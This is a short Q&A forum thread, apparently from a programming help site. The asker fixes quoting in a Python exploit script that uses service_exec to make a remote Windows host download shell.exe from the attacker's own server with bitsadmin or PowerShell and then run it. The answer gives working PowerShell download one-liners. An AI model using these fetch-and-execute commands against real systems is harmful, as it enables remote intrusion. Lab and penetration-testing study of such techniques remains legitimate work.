# python script - service_exe(conn, r'cmd /c question

Tags: python, windows, powershell

```
service_exec(conn, r'cmd /c bitsadmin /transfer pwn /download http://[IP]/shell.exe C:\shell.exe')
service_exec(conn, r'cmd /c /shell.exe')
```

This is just an excerpt from a python script. I can execute it and it creates a pwn.txt; however, When I make the modifications above. I see no download GET requests on my SimpleHTTPServer.
I verified that I'm serving the correct directory on my `python -m SimpleHTTPServer 80.`

I wanted to try using `powershell -c "(new-object System.Net.WebClient).DownloadFile('http://[IP]/shell.exe','c:\shell.exe')"`

so it would be:

```
service_exec(conn, r'cmd /c powershell -c "(new-object System.Net.WebClient).DownloadFile('http://[IP]/shell.exe','c:\shell.exe')"'
```

but I get this error:

```
  File "./xxxxxx.py", line 923                                                                                                                                                                                                              
    service_exec(conn, r'cmd /c powershell -c "(new-object System.Net.WebClient).DownloadFile('http://[Ip]/shell.exe','c:\shell.exe')"'                                                                                         
                                                                                                  ^                                                                                                                                        
SyntaxError: invalid syntax
```

What's the correct syntax for this command in this context?

Answer (score 0):

```
service_exec(conn, r'cmd /c powershell -c "(new-object System.Net.WebClient).DownloadFile('http://[IP]/shell.exe','c:\shell.exe')"'
```

Any reason the cmd /c is needed in the above? I just tested this from command prompt and it works:

```
powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('https://fakeurl/exe.exe','c:\shell.exe')"
```

Alternatively, invoke web request has simpler syntax:

```
Invoke-WebRequest -Uri 'http://[IP]/shell.exe' -OutFile 'c:\shell.exe'
```

Comment: hey thanks! i will try it again. I am not sure on why it is needed. I know that is was in this script. It was just strange why it was not pulling down the requests. thanks for the help.